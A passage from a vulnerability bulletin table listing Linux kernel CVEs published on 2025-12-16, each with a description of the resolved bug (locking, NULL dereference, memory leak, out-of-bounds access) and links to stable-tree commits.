raw_spin_rq_lock_nested+0x2b/0x40 raw_spin_rq_lock_nested+0x2b/0x40 scx_dump_state+0x3b3/0x1270 ? finish_task_switch+0x27e/0x840 scx_ops_error_irq_workfn+0x67/0x80 irq_work_single+0x113/0x260 irq_work_run_list.part.3+0x44/0x70 run_irq_workd+0x6b/0x90 ? __pfx_run_irq_workd+0x10/0x10 smpboot_thread_fn+0x529/0x870 ? __pfx_smpboot_thread_fn+0x10/0x10 kthread+0x305/0x3f0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x40/0x70 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> This commit therefore use rq_lock_irqsave/irqrestore() to replace rq_lock/unlock() in the scx_dump_state(). | 2025-12-16 | not yet calculated | CVE-2025-68202 | https://git.kernel.org/stable/c/13d1c96d3a9f208bc1aa8642f6362dca25a157d2 https://git.kernel.org/stable/c/b6109750063d3b9aca1c57031213ac5485a06c54 https://git.kernel.org/stable/c/5f02151c411dda46efcc5dc57b0845efcdcfc26d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix lock warning in amdgpu_userq_fence_driver_process Fix a potential deadlock caused by inconsistent spinlock usage between interrupt and process contexts in the userq fence driver. The issue occurs when amdgpu_userq_fence_driver_process() is called from both: - Interrupt context: gfx_v11_0_eop_irq() -> amdgpu_userq_fence_driver_process() - Process context: amdgpu_eviction_fence_suspend_worker() -> amdgpu_userq_fence_driver_force_completion() -> amdgpu_userq_fence_driver_process() In interrupt context, the spinlock was acquired without disabling interrupts, leaving it in {IN-HARDIRQ-W} state. When the same lock is acquired in process context, the kernel detects inconsistent locking since the process context acquisition would enable interrupts while holding a lock previously acquired in interrupt context. Kernel log shows: [ 4039.310790] inconsistent {IN-HARDIRQ-W} -> {HARDIRQ-ON-W} usage. [ 4039.310804] kworker/7:2/409 [HC0[0]:SC0[0]:HE1:SE1] takes: [ 4039.310818] ffff9284e1bed000 (&fence_drv->fence_list_lock){?...}-{3:3}, [ 4039.310993] {IN-HARDIRQ-W} state was registered at: [ 4039.311004] lock_acquire+0xc6/0x300 [ 4039.311018] _raw_spin_lock+0x39/0x80 [ 4039.311031] amdgpu_userq_fence_driver_process.part.0+0x30/0x180 [amdgpu] [ 4039.311146] amdgpu_userq_fence_driver_process+0x17/0x30 [amdgpu] [ 4039.311257] gfx_v11_0_eop_irq+0x132/0x170 [amdgpu] Fix by using spin_lock_irqsave()/spin_unlock_irqrestore() to properly manage interrupt state regardless of calling context. (cherry picked from commit ded3ad780cf97a04927773c4600823b84f7f3cc2) | 2025-12-16 | not yet calculated | CVE-2025-68203 | https://git.kernel.org/stable/c/1ad70a06d7e91c378b346a3718c81abb50a74b74 https://git.kernel.org/stable/c/6623c5f9fd877868fba133b4ae4dab0052e82dad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pmdomain: arm: scmi: Fix genpd leak on provider registration failure If of_genpd_add_provider_onecell() fails during probe, the previously created generic power domains are not removed, leading to a memory leak and potential kernel crash later in genpd_debug_add(). Add proper error handling to unwind the initialized domains before returning from probe to ensure all resources are correctly released on failure. Example crash trace observed without this fix: | Unable to handle kernel paging request at virtual address fffffffffffffc70 | CPU: 1 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.18.0-rc1 #405 PREEMPT | Hardware name: ARM LTD ARM Juno Development Platform/ARM Juno Development Platform | pstate: 00000005 (nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) | pc : genpd_debug_add+0x2c/0x160 | lr : genpd_debug_init+0x74/0x98 | Call trace: | genpd_debug_add+0x2c/0x160 (P) | genpd_debug_init+0x74/0x98 | do_one_initcall+0xd0/0x2d8 | do_initcall_level+0xa0/0x140 | do_initcalls+0x60/0xa8 | do_basic_setup+0x28/0x40 | kernel_init_freeable+0xe8/0x170 | kernel_init+0x2c/0x140 | ret_from_fork+0x10/0x20 | 2025-12-16 | not yet calculated | CVE-2025-68204 | https://git.kernel.org/stable/c/18249a167ffd91b4b4fbd92afd4ddcbf3af81f35 https://git.kernel.org/stable/c/c6e11d320fd6cbaef6d589f2fcb45aa25a6b960a https://git.kernel.org/stable/c/582f48d22eb5676fe7be3589b986ddd29f7bf4d1 https://git.kernel.org/stable/c/7f569197f7ad09319af960bd7e43109de5c67c04 https://git.kernel.org/stable/c/ad120c08b89a81d41d091490bbe150343473b659 https://git.kernel.org/stable/c/921b090841ae7a08b19ab14495bdf8636dc31e21 https://git.kernel.org/stable/c/983e91da82ec3e331600108f9be3ea61236f5c75 https://git.kernel.org/stable/c/7458f72cc28f9eb0de811effcb5376d0ec19094a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: hda/hdmi: Fix breakage at probing nvhdmi-mcp driver After restructuring and splitting the HDMI codec driver code, each HDMI codec driver contains the own build_controls and build_pcms ops. A copy-n-paste error put the wrong entries for nvhdmi-mcp driver; both build_controls and build_pcms are swapped. Unfortunately both callbacks have the very same form, and the compiler didn't complain it, either. This resulted in a NULL dereference because the PCM instance hasn't been initialized at calling the build_controls callback. Fix it by passing the proper entries. | 2025-12-16 | not yet calculated | CVE-2025-68205 | https://git.kernel.org/stable/c/d2aed6fac1148528181affb781aa683d6569042b https://git.kernel.org/stable/c/82420bd4e17bdaba8453fbf9e10c58c9ed0c9727 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: add seqadj extension for natted connections Sequence adjustment may be required for FTP traffic with PASV/EPSV modes. due to need to re-write packet payload (IP, port) on the ftp control connection. This can require changes to the TCP length and expected seq / ack_seq. The easiest way to reproduce this issue is with PASV mode. Example ruleset: table inet ftp_nat { ct helper ftp_helper { type "ftp" protocol tcp l3proto inet } chain prerouting { type filter hook prerouting priority 0; policy accept; tcp dport 21 ct state new ct helper set "ftp_helper" } } table ip nat { chain prerouting { type nat hook prerouting priority -100; policy accept; tcp dport 21 dnat ip prefix to ip daddr map { 192.168.100.1 : 192.168.13.2/32 } } chain postrouting { type nat hook postrouting priority 100 ; policy accept; tcp sport 21 snat ip prefix to ip saddr map { 192.168.13.2 : 192.168.100.1/32 } } } Note that the ftp helper gets assigned *after* the dnat setup. The inverse (nat after helper assign) is handled by an existing check in nf_nat_setup_info() and will not show the problem. Topoloy: +-------------------+ +----------------------------------+ | FTP: 192.168.13.2 | <-> | NAT: 192.168.13.3, 192.168.100.1 | +-------------------+ +----------------------------------+ | +-----------------------+ | Client: 192.168.100.2 | +-----------------------+ ftp nat changes do not work as expected in this case: Connected to 192.168.100.1. [..] ftp> epsv EPSV/EPRT on IPv4 off. ftp> ls 227 Entering passive mode (192,168,100,1,209,129). 421 Service not available, remote server has closed connection. Kernel logs: Missing nfct_seqadj_ext_add() setup call WARNING: CPU: 1 PID: 0 at net/netfilter/nf_conntrack_seqadj.c:41 [..] __nf_nat_mangle_tcp_packet+0x100/0x160 [nf_nat] nf_nat_ftp+0x142/0x280 [nf_nat_ftp] help+0x4d1/0x880 [nf_conntrack_ftp] nf_confirm+0x122/0x2e0 [nf_conntrack] nf_hook_slow+0x3c/0xb0 .. Fix this by adding the required extension when a conntrack helper is assigned to a connection that has a nat binding. | 2025-12-16 | not yet calculated | CVE-2025-68206 | https://git.kernel.org/stable/c/2b52d89cbbb0dbe3e948d8d9a91e704316dccfe6 https://git.kernel.org/stable/c/90918e3b6404c2a37837b8f11692471b4c512de2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/guc: Synchronize Dead CT worker with unbind Cancel and wait for any Dead CT worker to complete before continuing with device unbinding. Else the worker will end up using resources freed by the undind operation. (cherry picked from commit 492671339114e376aaa38626d637a2751cdef263) | 2025-12-16 | not yet calculated | CVE-2025-68207 | https://git.kernel.org/stable/c/35959ab7d16b618616edf6df882a4533d2efe193 https://git.kernel.org/stable/c/ce6ccf8e881a919bf902174ac879f80c97669498 https://git.kernel.org/stable/c/95af8f4fdce8349a5fe75264007f1af2aa1082ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: account for current allocated stack depth in widen_imprecise_scalars() The usage pattern for widen_imprecise_scalars() looks as follows: prev_st = find_prev_entry(env, ...); queued_st = push_stack(...); widen_imprecise_scalars(env, prev_st, queued_st); Where prev_st is an ancestor of the queued_st in the explored states tree. This ancestor is not guaranteed to have same allocated stack depth as queued_st. E.g. in the following case: def main(): for i in 1..2: foo(i) // same callsite, differnt param def foo(i): if i == 1: use 128 bytes of stack iterator based loop Here, for a second 'foo' call prev_st->allocated_stack is 128, while queued_st->allocated_stack is much smaller. widen_imprecise_scalars() needs to take this into account and avoid accessing bpf_verifier_state->frame[*]->stack out of bounds. | 2025-12-16 | not yet calculated | CVE-2025-68208 | https://git.kernel.org/stable/c/64b12dca2b0abcb5fc0542887d18b926ea5cf711 https://git.kernel.org/stable/c/9944c7938cd5b3f37b0afec0481c7c015e4f1c58 https://git.kernel.org/stable/c/57e04e2ff56e32f923154f0f7bc476fcb596ffe7 https://git.kernel.org/stable/c/b0c8e6d3d866b6a7f73877f71968dbffd27b7785 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mlx5: Fix default values in create CQ Currently, CQs without a completion function are assigned the mlx5_add_cq_to_tasklet function by default. This is problematic since only user CQs created through the mlx5_ib driver are intended to use this function. Additionally, all CQs that will use doorbells instead of polling for completions must call mlx5_cq_arm. However, the default CQ creation flow leaves a valid value in the CQ's arm_db field, allowing FW to send interrupts to polling-only CQs in certain corner cases. These two factors would allow a polling-only kernel CQ to be triggered by an EQ interrupt and call a completion function intended only for user CQs, causing a null pointer exception. Some areas in the driver have prevented this issue with one-off fixes but did not address the root cause. This patch fixes the described issue by adding defaults to the create CQ flow. It adds a default dummy completion function to protect against null pointer exceptions, and it sets an invalid command sequence number by default in kernel CQs to prevent the FW from sending an interrupt to the CQ until it is armed. User CQs are responsible for their own initialization values. Callers of mlx5_core_create_cq are responsible for changing the completion function and arming the CQ per their needs. | 2025-12-16 | not yet calculated | CVE-2025-68209 | https://git.kernel.org/stable/c/08469f5393a1a39f26a6e2eb2e8c33187665c1f4 https://git.kernel.org/stable/c/e5eba42f01340f73888dfe560be2806057c25913 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: avoid infinite loop due to incomplete zstd-compressed data Currently, the decompression logic incorrectly spins if compressed data is truncated in crafted (deliberately corrupted) images. | 2025-12-16 | not yet calculated | CVE-2025-68210 | https://git.kernel.org/stable/c/4d0e0bb1908acac5b27d30b45c450e8ead97eb00 https://git.kernel.org/stable/c/1f86d73a0afe43b6a85d2aa8207853350b7e2111 https://git.kernel.org/stable/c/f2a12cc3b97f062186568a7b94ddb7aa2ef68140 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item Currently, scan_get_next_rmap_item() walks every page address in a VMA to locate mergeable pages. This becomes highly inefficient when scanning large virtual memory areas that contain mostly unmapped regions, causing ksmd to use large amount of cpu without deduplicating much pages. This patch replaces the per-address lookup with a range walk using walk_page_range(). The range walker allows KSM to skip over entire unmapped holes in a VMA, avoiding unnecessary lookups. This problem was previously discussed in [1]. Consider the following test program which creates a 32 TiB mapping in the virtual address space but only populates a single page: #include <unistd.h> #include <stdio.h> #include <sys/mman.h> /* 32 TiB */ const size_t size = 32ul * 1024 * 1024 * 1024 * 1024; int main() { char *area = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_NORESERVE | MAP_PRIVATE | MAP_ANON, -1, 0); if (area == MAP_FAILED) { perror("mmap() failed\n"); return -1; } /* Populate a single page such that we get an anon_vma. */ *area = 0; /* Enable KSM. */ madvise(area, size, MADV_MERGEABLE); pause(); return 0; } $ ./ksm-sparse & $ echo 1 > /sys/kernel/mm/ksm/run Without this patch ksmd uses 100% of the cpu for a long time (more then 1 hour in my test machine) scanning all the 32 TiB virtual address space that contain only one mapped page. This makes ksmd essentially deadlocked not able to deduplicate anything of value. With this patch ksmd walks only the one mapped page and skips the rest of the 32 TiB virtual address space, making the scan fast using little cpu. | 2025-12-16 | not yet calculated | CVE-2025-68211 | https://git.kernel.org/stable/c/74f78421c925b6d17695566f0c5941de57fd44b3 https://git.kernel.org/stable/c/f62973e0767e4fcd6799087787fca08ca2a85b8c https://git.kernel.org/stable/c/f5548c318d6520d4fa3c5ed6003eeb710763cbc5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: Fix uninitialized 'offp' in statmount_string() In statmount_string(), most flags assign an output offset pointer (offp) which is later updated with the string offset. However, the STATMOUNT_MNT_UIDMAP and STATMOUNT_MNT_GIDMAP cases directly set the struct fields instead of using offp. This leaves offp uninitialized, leading to a possible uninitialized dereference when *offp is updated. Fix it by assigning offp for UIDMAP and GIDMAP as well, keeping the code path consistent. | 2025-12-16 | not yet calculated | CVE-2025-68212 | https://git.kernel.org/stable/c/acfde9400e611c8d2668f1c70053c4a1d6ecfc36 https://git.kernel.org/stable/c/0778ac7df5137d5041783fadfc201f8fd55a1d9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: idpf: fix possible vport_config NULL pointer deref in remove Attempting to remove the driver will cause a crash in cases where the vport failed to initialize. Following trace is from an instance where the driver failed during an attempt to create a VF: [ 1661.543624] idpf 0000:84:00.7: Device HW Reset initiated [ 1722.923726] idpf 0000:84:00.7: Transaction timed-out (op:1 cookie:2900 vc_op:1 salt:29 timeout:60000ms) [ 1723.353263] BUG: kernel NULL pointer dereference, address: 0000000000000028 ... [ 1723.358472] RIP: 0010:idpf_remove+0x11c/0x200 [idpf] ... [ 1723.364973] Call Trace: [ 1723.365475] <TASK> [ 1723.365972] pci_device_remove+0x42/0xb0 [ 1723.366481] device_release_driver_internal+0x1a9/0x210 [ 1723.366987] pci_stop_bus_device+0x6d/0x90 [ 1723.367488] pci_stop_and_remove_bus_device+0x12/0x20 [ 1723.367971] pci_iov_remove_virtfn+0xbd/0x120 [ 1723.368309] sriov_disable+0x34/0xe0 [ 1723.368643] idpf_sriov_configure+0x58/0x140 [idpf] [ 1723.368982] sriov_numvfs_store+0xda/0x1c0 Avoid the NULL pointer dereference by adding NULL pointer check for vport_config[i], before freeing user_config.q_coalesce. | 2025-12-16 | not yet calculated | CVE-2025-68213 | https://git.kernel.org/stable/c/a0e1c9bc1c9fe735978150ad075616a728073bc7 https://git.kernel.org/stable/c/d5be8663cff0ba7b94da34ebd499ce1123b4c334 https://git.kernel.org/stable/c/118082368c2b6ddefe6cb607efc312285148f044 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: timers: Fix NULL function pointer race in timer_shutdown_sync() There is a race condition between timer_shutdown_sync() and timer expiration that can lead to hitting a WARN_ON in expire_timers(). The issue occurs when timer_shutdown_sync() clears the timer function to NULL while the timer is still running on another CPU. The race scenario looks like this: CPU0 CPU1 <SOFTIRQ> lock_timer_base() expire_timers() base->running_timer = timer; unlock_timer_base() [call_timer_fn enter] mod_timer() ... timer_shutdown_sync() lock_timer_base() // For now, will not detach the timer but only clear its function to NULL if (base->running_timer != timer) ret = detach_if_pending(timer, base, true); if (shutdown) timer->function = NULL; unlock_timer_base() [call_timer_fn exit] lock_timer_base() base->running_timer = NULL; unlock_timer_base() ... // Now timer is pending while its function set to NULL. // next timer trigger <SOFTIRQ> expire_timers() WARN_ON_ONCE(!fn) // hit ... lock_timer_base() // Now timer will detach if (base->running_timer != timer) ret = detach_if_pending(timer, base, true); if (shutdown) timer->function = NULL; unlock_timer_base() The problem is that timer_shutdown_sync() clears the timer function regardless of whether the timer is currently running. This can leave a pending timer with a NULL function pointer, which triggers the WARN_ON_ONCE(!fn) check in expire_timers(). Fix this by only clearing the timer function when actually detaching the timer. If the timer is running, leave the function pointer intact, which is safe because the timer will be properly detached when it finishes running. | 2025-12-16 | not yet calculated | CVE-2025-68214 | https://git.kernel.org/stable/c/1a975716cc8977f461e45e28e3e5977d46ad7a6a https://git.kernel.org/stable/c/6665fbd7730b26d770c232b20d1b907e6a67a914 https://git.kernel.org/stable/c/176725f4848376530a0f0da9023f956afcc33585 https://git.kernel.org/stable/c/a01efa7a780c42ac5170a949bd95c9786ffcc60a https://git.kernel.org/stable/c/20739af07383e6eb1ec59dcd70b72ebfa9ac362c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: fix PTP cleanup on driver removal in error path Improve the cleanup on releasing PTP resources in error path. The error case might happen either at the driver probe and PTP feature initialization or on PTP restart (errors in reset handling, NVM update etc). In both cases, calls to PF PTP cleanup (ice_ptp_cleanup_pf function) and 'ps_lock' mutex deinitialization were missed. Additionally, ptp clock was not unregistered in the latter case. Keep PTP state as 'uninitialized' on init to distinguish between error scenarios and to avoid resource release duplication at driver removal. The consequence of missing ice_ptp_cleanup_pf call is the following call trace dumped when ice_adapter object is freed (port list is not empty, as it is required at this stage): [ T93022] ------------[ cut here ]------------ [ T93022] WARNING: CPU: 10 PID: 93022 at ice/ice_adapter.c:67 ice_adapter_put+0xef/0x100 [ice] ... [ T93022] RIP: 0010:ice_adapter_put+0xef/0x100 [ice] ... [ T93022] Call Trace: [ T93022] <TASK> [ T93022] ? ice_adapter_put+0xef/0x100 [ice 33d2647ad4f6d866d41eefff1806df37c68aef0c] [ T93022] ? __warn.cold+0xb0/0x10e [ T93022] ? ice_adapter_put+0xef/0x100 [ice 33d2647ad4f6d866d41eefff1806df37c68aef0c] [ T93022] ? report_bug+0xd8/0x150 [ T93022] ? handle_bug+0xe9/0x110 [ T93022] ? exc_invalid_op+0x17/0x70 [ T93022] ? asm_exc_invalid_op+0x1a/0x20 [ T93022] ? ice_adapter_put+0xef/0x100 [ice 33d2647ad4f6d866d41eefff1806df37c68aef0c] [ T93022] pci_device_remove+0x42/0xb0 [ T93022] device_release_driver_internal+0x19f/0x200 [ T93022] driver_detach+0x48/0x90 [ T93022] bus_remove_driver+0x70/0xf0 [ T93022] pci_unregister_driver+0x42/0xb0 [ T93022] ice_module_exit+0x10/0xdb0 [ice 33d2647ad4f6d866d41eefff1806df37c68aef0c] ... [ T93022] ---[ end trace 0000000000000000 ]--- [ T93022] ice: module unloaded | 2025-12-16 | not yet calculated | CVE-2025-68215 | https://git.kernel.org/stable/c/f5eb91f876ebecbcd90f9edcaea98dcb354603b3 https://git.kernel.org/stable/c/765236f2c4fbba7650436b71a0e350500e9ec15f https://git.kernel.org/stable/c/23a5b9b12de9dcd15ebae4f1abc8814ec1c51ab0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Disable trampoline for kernel module function trace The current LoongArch BPF trampoline implementation is incompatible with tracing functions in kernel modules. This causes several severe and user-visible problems: * The `bpf_selftests/module_attach` test fails consistently. * Kernel lockup when a BPF program is attached to a module function [1]. * Critical kernel modules like WireGuard experience traffic disruption when their functions are traced with fentry [2]. Given the severity and the potential for other unknown side-effects, it is safest to disable the feature entirely for now. This patch prevents the BPF subsystem from allowing trampoline attachments to kernel module functions on LoongArch. This is a temporary mitigation until the core issues in the trampoline code for kernel module handling can be identified and fixed. [root@fedora bpf]# ./test_progs -a module_attach -v bpf_testmod.ko is already unloaded. Loading bpf_testmod.ko... Successfully loaded bpf_testmod.ko. test_module_attach:PASS:skel_open 0 nsec test_module_attach:PASS:set_attach_target 0 nsec test_module_attach:PASS:set_attach_target_explicit 0 nsec test_module_attach:PASS:skel_load 0 nsec libbpf: prog 'handle_fentry': failed to attach: -ENOTSUPP libbpf: prog 'handle_fentry': failed to auto-attach: -ENOTSUPP test_module_attach:FAIL:skel_attach skeleton attach failed: -524 Summary: 0/0 PASSED, 0 SKIPPED, 1 FAILED Successfully unloaded bpf_testmod.ko. [1]: https://lore.kernel.org/loongarch/CAK3+h2wDmpC-hP4u4pJY8T-yfKyk4yRzpu2LMO+C13FMT58oqQ@mail.gmail.com/ [2]: https://lore.kernel.org/loongarch/CAK3+h2wYcpc+OwdLDUBvg2rF9rvvyc5amfHT-KcFaK93uoELPg@mail.gmail.com/ | 2025-12-16 | not yet calculated | CVE-2025-68216 | https://git.kernel.org/stable/c/44eb3849378be5f72b8be03edbacbdcd6f5eade4 https://git.kernel.org/stable/c/677e6123e3d24adaa252697dc89740f2ac07664e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: pegasus-notetaker - fix potential out-of-bounds access In the pegasus_notetaker driver, the pegasus_probe() function allocates the URB transfer buffer using the wMaxPacketSize value from the endpoint descriptor. An attacker can use a malicious USB descriptor to force the allocation of a very small buffer. Subsequently, if the device sends an interrupt packet with a specific pattern (e.g., where the first byte is 0x80 or 0x42), the pegasus_parse_packet() function parses the packet without checking the allocated buffer size. This leads to an out-of-bounds memory access. | 2025-12-16 | not yet calculated | CVE-2025-68217 | https://git.kernel.org/stable/c/c4e746651bd74c38f581e1cf31651119a94de8cd https://git.kernel.org/stable/c/36bc92b838ff72f62f2c17751a9013b29ead2513 https://git.kernel.org/stable/c/015b719962696b793997e8deefac019f816aca77 https://git.kernel.org/stable/c/084264e10e2ae8938a54355123ad977eb9df56d6 https://git.kernel.org/stable/c/d344ea1baf1946c90f0cd6f9daeb5f3e0a0ca479 https://git.kernel.org/stable/c/9ab67eff6d654e34ba6da07c64761aa87c2a3c26 https://git.kernel.org/stable/c/763c3f4d2394a697d14af1335d3bb42f05c9409f https://git.kernel.org/stable/c/69aeb507312306f73495598a055293fa749d454e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-multipath: fix lockdep WARN due to partition scan work Blktests test cases nvme/014, 057 and 058 fail occasionally due to a lockdep WARN. As reported in the Closes tag URL, the WARN indicates that a deadlock can happen due to the dependency among disk->open_mutex, kblockd workqueue completion and partition_scan_work completion. To avoid the lockdep WARN and the potential deadlock, cut the dependency by running the partition_scan_work not by kblockd workqueue but by nvme_wq. | 2025-12-16 | not yet calculated | CVE-2025-68218 | https://git.kernel.org/stable/c/89456dab7ba5ab63d60945440926673a3205e829 https://git.kernel.org/stable/c/e2a897ad5f538d314955c747a0a2edb184fcdecd https://git.kernel.org/stable/c/ef4ab2a8abe554379e10303ae86f7c501336ba0d https://git.kernel.org/stable/c/b03eb63288a8ffe3adfb34e68309c8e2edb06d0b https://git.kernel.org/stable/c/6d87cd5335784351280f82c47cc8a657271929c3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix memory leak in smb3_fs_context_parse_param error path Add proper cleanup of ctx->source and fc->source to the cifs_parse_mount_err error handler. This ensures that memory allocated for the source strings is correctly freed on all error paths, matching the cleanup already performed in the success path by smb3_cleanup_fs_context_contents(). Pointers are also set to NULL after freeing to prevent potential double-free issues. This change fixes a memory leak originally detected by syzbot. The leak occurred when processing Opt_source mount options if an error happened after ctx->source and fc->source were successfully allocated but before the function completed. The specific leak sequence was: 1. ctx->source = smb3_fs_context_fullpath(ctx, '/') allocates memory 2. fc->source = kstrdup(ctx->source, GFP_KERNEL) allocates more memory 3. A subsequent error jumps to cifs_parse_mount_err 4. The old error handler freed passwords but not the source strings, causing the memory to leak. This issue was not addressed by commit e8c73eb7db0a ("cifs: client: fix memory leak in smb3_fs_context_parse_param"), which only fixed leaks from repeated fsconfig() calls but not this error path. Patch updated with minor change suggested by kernel test robot | 2025-12-16 | not yet calculated | CVE-2025-68219 | https://git.kernel.org/stable/c/7627864dc3121f39e220f5253a227edf472de59e https://git.kernel.org/stable/c/48d69290270891f988e72edddd9688c20515421d https://git.kernel.org/stable/c/37010021d7e0341bb241ca00bcbae31f2c50b23f https://git.kernel.org/stable/c/7e4d9120cfa413dd34f4f434befc5dbe6c38b2e5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: ti: netcp: Standardize knav_dma_open_channel to return NULL on error Make knav_dma_open_channel consistently return NULL on error instead of ERR_PTR. Currently the header include/linux/soc/ti/knav_dma.h returns NULL when the driver is disabled, but the driver implementation does not even return NULL or ERR_PTR on failure, causing inconsistency in the users. This results in a crash in netcp_free_navigator_resources as followed (trimmed): Unhandled fault: alignment exception (0x221) at 0xfffffff2 [fffffff2] *pgd=80000800207003, *pmd=82ffda003, *pte=00000000 Internal error: : 221 [#1] SMP ARM Modules linked in: CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.17.0-rc7 #1 NONE Hardware name: Keystone PC is at knav_dma_close_channel+0x30/0x19c LR is at netcp_free_navigator_resources+0x2c/0x28c [... TRIM...] Call trace: knav_dma_close_channel from netcp_free_navigator_resources+0x2c/0x28c netcp_free_navigator_resources from netcp_ndo_open+0x430/0x46c netcp_ndo_open from __dev_open+0x114/0x29c __dev_open from __dev_change_flags+0x190/0x208 __dev_change_flags from netif_change_flags+0x1c/0x58 netif_change_flags from dev_change_flags+0x38/0xa0 dev_change_flags from ip_auto_config+0x2c4/0x11f0 ip_auto_config from do_one_initcall+0x58/0x200 do_one_initcall from kernel_init_freeable+0x1cc/0x238 kernel_init_freeable from kernel_init+0x1c/0x12c kernel_init from ret_from_fork+0x14/0x38 [... TRIM...] Standardize the error handling by making the function return NULL on all error conditions. The API is used in just the netcp_core.c so the impact is limited. Note, this change, in effect reverts commit 5b6cb43b4d62 ("net: ethernet: ti: netcp_core: return error while dma channel open issue"), but provides a less error prone implementation. | 2025-12-16 | not yet calculated | CVE-2025-68220 | https://git.kernel.org/stable/c/af6b10a13fc0aee37df4a8292414cc055c263fa3 https://git.kernel.org/stable/c/8427218ecbd7f8559c37972e66cb0fa06e82353b https://git.kernel.org/stable/c/3afeb909c3e2e0eb19b1e20506196e5f2d9c2259 https://git.kernel.org/stable/c/2572c358ee434ce4b994472cceeb4043cbff5bc5 https://git.kernel.org/stable/c/952637c5b9be64539cd0e13ef88db71a1df46373 https://git.kernel.org/stable/c/fbb53727ca789a8d27052aab4b77ca9e2a0fae2b https://git.kernel.org/stable/c/f9608637ecc165d7d6341df105aee44691461fb9 https://git.kernel.org/stable/c/90a88306eb874fe4bbdd860e6c9787f5bbc588b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix address removal logic in mptcp_pm_nl_rm_addr Fix inverted WARN_ON_ONCE condition that prevented normal address removal counter updates. The current code only executes decrement logic when the counter is already 0 (abnormal state), while normal removals (counter > 0) are ignored. | 2025-12-16 | not yet calculated | CVE-2025-68221 | https://git.kernel.org/stable/c/f7d953c38245c0e9d8e268fb6a9e524602fb44ec https://git.kernel.org/stable/c/92e239e36d600002559074994a545fcfac9afd2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: s32cc: fix uninitialized memory in s32_pinctrl_desc s32_pinctrl_desc is allocated with devm_kmalloc(), but not all of its fields are initialized. Notably, num_custom_params is used in pinconf_generic_parse_dt_config(), resulting in intermittent allocation errors, such as the following splat when probing i2c-imx: WARNING: CPU: 0 PID: 176 at mm/page_alloc.c:4795 __alloc_pages_noprof+0x290/0x300 [...] Hardware name: NXP S32G3 Reference Design Board 3 (S32G-VNP-RDB3) (DT) [...] Call trace: __alloc_pages_noprof+0x290/0x300 (P) ___kmalloc_large_node+0x84/0x168 __kmalloc_large_node_noprof+0x34/0x120 __kmalloc_noprof+0x2ac/0x378 pinconf_generic_parse_dt_config+0x68/0x1a0 s32_dt_node_to_map+0x104/0x248 dt_to_map_one_config+0x154/0x1d8 pinctrl_dt_to_map+0x12c/0x280 create_pinctrl+0x6c/0x270 pinctrl_get+0xc0/0x170 devm_pinctrl_get+0x50/0xa0 pinctrl_bind_pins+0x60/0x2a0 really_probe+0x60/0x3a0 [...] __platform_driver_register+0x2c/0x40 i2c_adap_imx_init+0x28/0xff8 [i2c_imx] [...] This results in later parse failures that can cause issues in dependent drivers: s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property [...] pca953x 0-0022: failed writing register: -6 i2c i2c-0: IMX I2C adapter registered s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property i2c i2c-1: IMX I2C adapter registered s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property i2c i2c-2: IMX I2C adapter registered Fix this by initializing s32_pinctrl_desc with devm_kzalloc() instead of devm_kmalloc() in s32_pinctrl_probe(), which sets the previously uninitialized fields to zero. | 2025-12-16 | not yet calculated | CVE-2025-68222 | https://git.kernel.org/stable/c/3b90bd8aaeb21b513ecc4ed03299e80ece44a333 https://git.kernel.org/stable/c/583ac7f65791ceda38ea1a493a4859f7161dcb03 https://git.kernel.org/stable/c/7bbdd6c30e8fd92f7165b7730b038cfe42102004 https://git.kernel.org/stable/c/97ea34defbb57bfaf71ce487b1b0865ffd186e81 |
